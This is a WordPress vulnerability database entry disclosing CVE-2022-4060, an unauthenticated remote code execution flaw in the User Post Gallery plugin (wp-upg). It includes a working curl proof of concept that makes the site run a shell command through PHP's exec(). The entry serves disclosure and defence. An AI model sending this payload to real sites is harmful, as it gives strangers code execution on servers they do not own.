WordPress Plugin Vulnerabilities

User Post Gallery <= 2.19 - Unauthenticated RCE

Description

The plugin does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it.

Proof of Concept

Invoke the following curl command to execute the "id" command via PHP's exec() function:

curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'

Affects Plugins

wp-upg

No known fix - plugin closed

References

CVE

CVE-2022-4060

Classification

Type

RCE

OWASP top 10

A1: Injection

CWE

CWE-94

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

cyllective

Verified

Yes

WPVDB ID

8f982ebd-6fc5-452d-8280-42e027d01b1e

Timeline

Publicly Published

2022-12-23 (about 3 months ago)

Added

2022-12-23 (about 3 months ago)

Last Updated

2022-12-23 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin